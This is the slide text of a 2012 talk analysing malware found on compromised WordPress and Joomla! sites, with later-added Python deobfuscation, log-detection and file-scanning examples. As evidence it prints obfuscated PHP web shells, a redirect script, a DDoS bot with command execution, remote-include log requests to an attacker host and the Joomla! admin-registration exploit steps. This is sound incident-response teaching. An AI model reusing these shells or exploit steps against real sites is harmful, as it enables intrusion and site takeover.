Twas the night before Malware

DESCRIPTION

Talk from Desert CodeCamp 2012.

‘Twas the Night before Malware…

Presented by Arleen Hess and Pax Whitmore

Twas the night before malware, and all through the house,

Not a peripheral was stirring, not even the mouse.

The plugins were arranged and running with care,

In the hopes that customers soon would be there.

When out in the logs there arose such a clatter,

I sprang to my terminal to see what was the matter.

And what to my wondering eyes should appear,

But KAK and FilesMan were all up in here.

The new site was running, the dev site was shed,

And users into the website were led,

WordPress in its kerchief, and Joomla! in its cap,

Had just fallen into the ol' malware trap.

Disclaimer

• The thoughts and opinions expressed in this presentation are those of the presenters and are not a reflection of the official policies or positions of GoDaddy.com, LLC.

About Us

Outline

• What is malware?
• All for LULZ?
• Why look at a CMS?
• Discovering malware
• Malware examples
  – WordPress
  – Joomla!
  – FTP Compromise
• How to find and fix malware
• How to prevent malware

What is malware?

• Short for malicious software
• Used to disrupt websites in a variety of ways
  – Redirect users to phishing sites
  – Download files onto users' computers
  – Use exploited system as a base of DDoS or phishing attacks

All for LULZ?

Why look at a CMS?

• Content Management Systems are widely used
  – WordPress 3.4 has over 23 million downloads
  – Joomla! powers over 2600 government sites
• Open-source applications are complex
• Wide range of plugins and themes

Discovering Malware…

• Site owner alerted by users

• Users being blocked or redirected

• Found site was listed on Google Safe Browsing

WordPress – Search

• Ran a script to search for common malicious content

2011-11-23 00:53:42 /wp-content/themes/mainstream/cache/74bd10fe94d1b17c86da24fd8df55f65.php
2012-09-09 14:19:08 /wp-content/themes/mainstream/cache/27b23905b513a0ba176072cae7f53ede.php
2012-10-24 02:40:28 /wp-content/themes/mainstream/cache/ca0f54f8f7599facfa9af8b66ac11a5f.php

WordPress – Content strings 74bd10fe94d1b17c86da24fd8df55f65.php

GIF89a??????????!??????,?????;?
$language = 'eng';
$auth = 0;
$name = ''; // md5 Login
$pass = ''; // md5 Password
/**************************************************************************************************************************************************************/
error_reporting(0);
$bery="7b17e9pVsjj8f54n307R+gwwgzHibxs79vh+W[snip]iyHw4+KGLx/[snip]";
eval(gzinflate(str_rot13(base64_decode($bery))));

WordPress – Content strings 27b23905b513a0ba176072cae7f53ede.php

GIF89a
eval (base64_decode ("aWYgKGlzc2V0KCRfUkVRVUVTVFsnYXNjJ10pKSB7IGV2YWwoc3RyaXBzbGFzaGVzKCRfUkVRVUVTVFsnYXNjJ10pKTsgZXhpdDsgfS8qIERuZkNEMVJTRzZrRDggK

WordPress – Content strings ca0f54f8f7599facfa9af8b66ac11a5f.php

/*gHrE={M*/eval/*t%)t*/(/*_f0srO*/base64_decode/*\x31sm*/(/*Y%>\\*/'Lyo/WFdNR2Z5byovZXZhbC8qTEBXfjUqLygvKidoSCovYmFzZTY0X2RlY29kZS8qNXJcYzAqLygvKjo+ZEMqLydMeW83VmtwQlN6NHFMMmxtTHlwN2IxNHFMeWd2S24nLyp0XVJKOiovLi8qYVw+Ml1rKi8nUTlPSHRtTlM0cUwybHpjMlYwTHlwQWV6WlJMU292Jy8qPn5NLSovLi8qLmBrVGdVTCovJ0tDOHFPVEJlTkU4cUx5UmZVa1ZSVlVWVFZDOHFXRycvKik6WiovLi8qOURGREl5cyovJ29sZmpZcUwxc3ZLa1JsYkNvdkoyRW5MeW9vTVNseCcvKkZiTkBXSSovLi8qYkR2SzYqLydWQ292TGk4cWZGVXdYQ292SjNOakp5OHFKazAzTWknLypmKTR7cSovLi8qfU9KV1hmKi8nb3ZYUzhxZWpaeUlGd3FMeThxVW1rM1dYQXFMeWt2Jy8qIHtTKzs8PiovLi8qbWU/UyovJ0tuSmRQelZOS2k4dktpWkRmQ292S1M4cVpWTnNYbicvKmBhcEgmMkwqLy4vKlJPTzslKi8nNThLaTls'/*`!3'1W*/./*Py1!!Ff5>*/'[snip]'/*XYx!oU92*/)/*3{]}s*//*,NC123~P*/)/*m!?`\*//*w!blx*/;/*upY`MI2*/

Deobfuscation:

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (!stristr($uag,"MSIE 7.0")){
            if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or
                stristr($referer,"gogo") or stristr($referer,"live.com") or stristr($referer,"aport") or
                stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun(dot)ru") or
                stristr($referer,"stumbleupon(dot)com") or stristr($referer,"bit(dot)ly") or
                stristr($referer,"tinyurl(dot)com") or
                preg_match("/yandex\(dot)ru\/yandsearch\?(.*?)\&lr\=/",$referer) or
                preg_match ("/google\.(.*?)\/url\?sa/",$referer) or
                stristr($referer,"myspace(dot)com") or stristr($referer,"facebook(dot)com") or
                stristr($referer,"aol(dot)com")) {
                if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
                    header("Location: http://malicious(dot)evulz(dot)com/");
                    exit();
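Peeling these layers by hand is tedious, so here is an added example (not the presenters' code, and not taken from the malware) that unwraps eval()-wrapped base64_decode/str_rot13/gzinflate chains statically, without executing any PHP; it also handles the comment-padded, 'a'.'b'-concatenated form of the third sample. build_sample() is a constructed input shaped like the $bery dropper, not a file from the slides.

```python
# Added example, not code from the talk: statically peel the eval(...(base64_decode('...')))
# wrappers seen in the three samples above, without executing any of the PHP.
import base64
import codecs
import re
import zlib

# Inverse of each PHP wrapper in the samples; bytes in, bytes out. Unknown names stop
# the unwrapping rather than guessing. PHP gzinflate() is raw DEFLATE, hence wbits=-15.
DECODERS = {
    "base64_decode": base64.b64decode,
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot13").encode("latin-1"),
    "gzinflate": lambda b: zlib.decompress(b, -15),
    "gzuncompress": zlib.decompress,
}
# eval( f1( f2( 'literal' ) ) );  group 1 = call chain, group 3 = the quoted literal
CHAIN = re.compile(r"eval\s*\(\s*((?:\w+\s*\(\s*)+)(['\"])(.*?)\2\s*\)+\s*;?", re.S)


def normalize(src):
    """Strip /* junk */ padding and join 'ab'.'cd' literal concatenations."""
    src = re.sub(r"/\*.*?\*/", "", src, flags=re.S)
    return re.sub(r"(['\"])\s*\.\s*\1", "", src)


def unwrap(src, max_layers=8):
    """Return (recovered source, list of wrappers applied innermost-first)."""
    applied = []
    for _ in range(max_layers):            # droppers often nest several layers
        m = CHAIN.search(normalize(src))
        if not m:
            break
        data = m.group(3).encode("latin-1")
        for name in reversed(re.findall(r"\w+", m.group(1))):   # innermost call runs first
            if name not in DECODERS:
                return src, applied
            data = DECODERS[name](data)
            applied.append(name)
        src = data.decode("latin-1", errors="replace")
    return src, applied


def build_sample():
    """Constructed input shaped like the $bery sample: deflate -> rot13 -> base64 -> eval."""
    plain = b"<?php header('Location: http://redirect.example.invalid/'); exit();"
    deflater = zlib.compressobj(wbits=-15)
    rot = codecs.encode((deflater.compress(plain) + deflater.flush()).decode("latin-1"), "rot13")
    return "eval(gzinflate(str_rot13(base64_decode('%s'))));" % base64.b64encode(rot.encode("latin-1")).decode()
```

The recovered source is returned as text for reading, never run; a wrapper name outside DECODERS leaves the input untouched so nothing is silently misdecoded.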

WordPress – Log Review

x.x.x.x - - [09/Sep/2012:14:18:58 -0700] "GET /wp-content/themes/mainstream/functions/thumb.php?src=http://blogger.evulz.tld/stat/n/s.php HTTP/1.1" 404

x.x.x.x - - [09/Sep/2012:14:19:07 -0700] "GET /wp-content/themes/mainstream/thumb.php HTTP/1.1" 200

x.x.x.x - - [09/Sep/2012:14:19:07 -0700] "GET /wp-content/themes/mainstream/thumb.php?src=http://blogger.evulz.tld/stat/n/s.php HTTP/1.1" 200

WordPress – What Happened?

• Attackers used thumb.php

• Three separate times
  – Over one year

• Thumb.php was not updated

• Uploaded shells were used to alter other content

Joomla! – How it works

– Exploiting Joomla! 1.6.x/1.7.x/2.5.0-2.5.2
  • index.php?option=com_users&view=registration
– Start to register a user account
– Cause the registration process to fail
  • Failing to enter the same pwd twice
  • Failing the captcha
– Before submitting, elevate user privilege to admin
  • Firebug: <input name="jform[groups][]" value="7" />
  • Tamper Data: jform[groups][]=7
– Complete registration when the form reloads

Joomla!

• Sample logs showing the registration of the malicious user:

x.x.x.x - - [02/Aug/2012:09:03:32 -0700] "POST evulz.tld/component/users/?task=registration.register HTTP/1.1" 303
x.x.x.x - - [02/Aug/2012:09:03:34 -0700] "POST evulz.tld/component/users/?task=registration.register HTTP/1.1" 303

Joomla!

• Sample logs showing the error.php file being edited:

x.x.x.x - - [04/Aug/2012:00:31:17 -0700] "POST evulz.tld/administrator/index.php HTTP/1.1" 303
x.x.x.x - - [04/Aug/2012:00:31:23 -0700] "POST evulz.tld/administrator/index.php?option=com_templates&layout=edit HTTP/1.1" 303
x.x.x.x - - [04/Aug/2012:00:31:25 -0700] "POST evulz.tld/administrator/index.php HTTP/1.1" 303
x.x.x.x - - [04/Aug/2012:00:31:28 -0700] "POST evulz.tld/administrator/index.php?option=com_templates&layout=edit HTTP/1.1" 303
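The two log patterns shown on the WordPress and Joomla! log slides (thumb.php being asked to fetch a remote src, and an account registered through the public form that later POSTs to the template editor) as detection logic, added here as an example that is not part of the talk. The log lines, addresses and hosts are constructed; correlating a registration with later admin activity by source IP is an assumption that will over-match behind a shared NAT.

```python
# Added example, not code from the talk: the two log patterns shown on the WordPress and
# Joomla! slides, run over constructed test lines (RFC 5737 addresses, .invalid hosts).
import re
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
SAMPLE_LOG = """\
203.0.113.7 - - [09/Sep/2012:14:18:58 -0700] "GET /wp-content/themes/mainstream/functions/thumb.php?src=http://blogger.example.invalid/stat/n/s.php HTTP/1.1" 404
203.0.113.7 - - [09/Sep/2012:14:19:07 -0700] "GET /wp-content/themes/mainstream/thumb.php?src=http://blogger.example.invalid/stat/n/s.php HTTP/1.1" 200
198.51.100.9 - - [02/Aug/2012:09:03:32 -0700] "POST /component/users/?task=registration.register HTTP/1.1" 303
198.51.100.9 - - [04/Aug/2012:00:31:23 -0700] "POST /administrator/index.php?option=com_templates&layout=edit HTTP/1.1" 303
192.0.2.4 - - [04/Aug/2012:10:00:00 -0700] "GET /wp-content/themes/mainstream/thumb.php?src=images/logo.png HTTP/1.1" 200
"""

def parse(line):
    """One access-log line -> dict, or None when it is not in the common log format."""
    m = LINE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    url = urlsplit(target)
    return {"ip": ip, "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), "method": method,
            "path": url.path, "query": parse_qs(url.query), "status": int(status)}

def find_remote_src(events):
    """thumb.php asked to fetch an absolute URL: the remote include the WP log slide shows."""
    hits = []
    for e in events:
        if e["path"].endswith("thumb.php"):
            for src in e["query"].get("src", []):
                if src.lower().startswith(("http://", "https://", "//")):
                    hits.append((e["ip"], e["status"], src))
    return hits

def find_self_registered_editors(events):
    """IPs that POSTed a Joomla! registration and later POSTed to the template editor."""
    registered, hits = {}, []
    for e in sorted(events, key=lambda ev: ev["time"]):
        is_post = e["method"] == "POST"
        if is_post and e["query"].get("task") == ["registration.register"]:
            registered.setdefault(e["ip"], e["time"])   # first registration per IP
        elif (is_post and e["ip"] in registered and e["query"].get("option") == ["com_templates"]
              and e["query"].get("layout") == ["edit"]):
            hits.append((e["ip"], registered[e["ip"]], e["time"]))
    return hits

def events(log_text):
    return [ev for ev in map(parse, log_text.splitlines()) if ev]
```

Note that the first thumb.php hit on the slide returned 404 and the second 200: flagging on the request rather than the status catches the probe as well as the success.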

Joomla! - Content

error_reporting(0);
$base = dirname(__FILE__)."/";
function stoped() {
    unlink($base."stph.php");
    unlink($base."stcp.php");
    cmdexec("killall ping;");
    cmdexec("killall -9 perl; killall -9 perl-bin;killall -9 perl-cgi;");
    unlink($base."start.php");
    unlink($base."f1.pl");
    unlink($base."run.pl");
    unlink($base."startphp.php");
    print "<stopcleandos>Stop & Clean</stopcleandos>";
}
function UploadFile($File){
    cmdexec("killall -9 perl");
    cmdexec("killall -9 perl-bin");
    cmdexec("killall -9 perl-cgi");
    $target_path ="./";
    $target_path = $target_path . basename( $File['name']);
    @move_uploaded_file($File['tmp_name'], $target_path);
}
function cmdexec($cmd){
    if(function_exists('exec'))@exec($cmd);
    elseif(function_exists('shell_exec'))@shell_exec($cmd);
}

Joomla! - Content

$up = "<?php eval(gzinflate(base64_decode('[snip]')));

Joomla! - Content

switch($_POST['action']){
    case "upload":
        UploadFile($_FILES['file']);
        break;
    case "stop":
        stoped();
        break;
    case "ust":
        $page = curPageURL();
        $ip = $_POST['ip'];
        $port = "11";
        $out = $page."\n";
        $socket = stream_socket_client("udp://$ip:$port");
        if ($socket) {
            stream_set_write_buffer($socket, 0);
            stream_socket_sendto($socket,$out);
        }
        fclose($socket);
        break;
    case "ab":
        $url = $_POST['url'];
        $c = $_POST['c'];
        $n = $_POST['n'];
        cmdexec("ab -c $c -n $n $url");
        break;
    default:
        DNullRequest();
        break;
}

The moral of the Joomla! Story…

FTP Compromise

2012-10-18 22:08:22 x.x.x.x MyRealUser 21 [15608] created SomeMaliciousFile.exe
2012-10-18 22:08:22 x.x.x.x MyRealUser 21 [14608] closed - - 426 0 0 - -
2012-10-18 22:08:22 x.x.x.x MyRealUser 21 [14608] created /MyRealUser/Dir1/MyDownloaderSetupFull.exe
2012-10-18 22:08:22 x.x.x.x MyRealUser 21 [14711] USER MyRealUser
2012-10-18 22:08:22 x.x.x.x MyRealUser 21 [14711] PASS - - 230 0 0 - -
2012-10-18 22:08:22 x.x.x.x MyRealUser 21 [14711] CWD /MyRealUser/Dir1
2012-10-18 22:12:06 x.x.x.x MyRealUser 21 [14609] appended /MyRealUser/Dir1/SomeMaliciousFile.exe
2012-10-18 22:16:45 x.x.x.x MyRealUser 21 [14609] created /MyRealUser/Dir1/SomeMaliciousFile.exe
2012-10-18 22:19:56 x.x.x.x MyRealUser 21 [14711] created /MyRealUser/Dir1/SomeMaliciousFile.exe
2012-10-18 22:21:07 x.x.x.x MyRealUser 21 [14609] created /MyRealUser/Dir1/SomeMaliciousFile.exe
2012-10-18 22:34:05 x.x.x.x MyRealUser 21 [14609] created /MyRealUser/Dir1/SomeMaliciousFile.exe
2012-10-18 22:37:42 x.x.x.x MyRealUser 21 [14711] created /MyRealUser/Dir1/SomeMaliciousFile.exe
2012-10-18 22:46:51 x.x.x.x MyRealUser 21 [14711] created /MyRealUser/Dir1/SomeMaliciousFile.exe
2012-10-18 22:48:14 x.x.x.x MyRealUser 21 [14609] created /MyRealUser/Dir1/SomeMaliciousFile.exe
2012-10-18 22:51:20 x.x.x.x MyRealUser 21 [14711] created /MyRealUser/Dir1/SomeMaliciousFile.exe
2012-10-18 22:51:56 x.x.x.x MyRealUser 21 [14711] created SomeMaliciousFile.exe - 550 0 240120 -

How FTP Gets Compromised

• Keyloggers or other malicious software on your computer

• Gaining FTP access via your own credentials and IP

How to find and fix malware

• Automated tools or scripts search for common phrases or exploits

• Check commonly affected files, such as .htaccess, header.php, footer.php, etc.

• Check for odd filenames or typos (e.g. indx.php vs. index.php)

• Review and edit each file individually
• Restore from clean backups (which everyone keeps, right?)
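An added example (not the presenters' script) of the automated search described on the WordPress search slide and the checks listed above: classify() encodes the indicators from this deck's samples (GIF89a header on a PHP file, stacked decode-and-eval wrappers, comment-padded eval(), the FilesMan marker, 32-hex names in a cache directory, typo look-alikes of core filenames) and scan_tree() applies it to a document root. The core-filename list and the look-alike similarity threshold are assumptions.

```python
# Added example, not code from the talk: flag the indicators the search and
# find-and-fix slides describe. classify() works on bytes so it can be tested
# without touching disk; scan_tree() applies it to a docroot.
import difflib
import os
import re

# Signatures taken from the samples in this deck: GIF header on a PHP file, stacked
# decode-and-eval wrappers, comment-padded eval(), the FilesMan shell marker.
EVAL_CHAIN = re.compile(rb"eval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(", re.I)
PADDED_EVAL = re.compile(rb"eval\s*(?:/\*.*?\*/\s*)+\(", re.S)
HEX_NAME = re.compile(r"^[0-9a-f]{32}\.php$")   # cache/<md5>.php, as in the WP search slide
CORE = ["index.php", "wp-config.php", "configuration.php", "wp-login.php"]  # assumed list


def classify(path, data):
    """Return the reasons a file looks malicious (empty list if none)."""
    reasons = []
    base = os.path.basename(path)
    if data.startswith(b"GIF89a") and b"<?php" in data:
        reasons.append("GIF89a header on a file containing PHP")
    if EVAL_CHAIN.search(data):
        reasons.append("eval() of a decoded or inflated payload")
    if PADDED_EVAL.search(data):
        reasons.append("eval() padded with /* */ comments")
    if b"FilesMan" in data:
        reasons.append("FilesMan web shell marker")
    if HEX_NAME.match(base) and "/cache/" in path.replace("\\", "/"):
        reasons.append("32-hex .php name inside a cache directory")
    # Typo look-alikes (indx.php vs index.php): a near miss of a core name, not the name itself.
    if base not in CORE and difflib.get_close_matches(base, CORE, n=1, cutoff=0.9):
        reasons.append("look-alike of a core filename")
    return reasons


def scan_tree(root, exts=(".php", ".inc", ".htaccess")):
    """Walk a docroot and return {path: reasons} for every file classify() flags."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    data = fh.read(1 << 20)   # first MiB is enough for these checks
                reasons = classify(path, data)
                if reasons:
                    findings[path] = reasons
    return findings
```

Hits are leads for the manual file-by-file review the slide calls for, not a verdict: a legitimate plugin can use base64_decode(), and a clean restore from a known-good backup remains the reliable fix.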

How to prevent malware

• Keep your web application up-to-date
• Regularly check your content
• Use strong and unique passwords
• Ensure your own computer is secure
• Remove unused or old content from server
• Keep your clean backups totally separate

Tools

• http://www.rexswain.com/httpview.html
• http://jsunpack.jeek.org/
• http://home.paulschou.net/tools/xlate/
• https://www.owasp.org/index.php/Main_Page
• http://nvd.nist.gov/
• http://osvdb.org/
• http://codex.wordpress.org/Hardening_WordPress

Recommended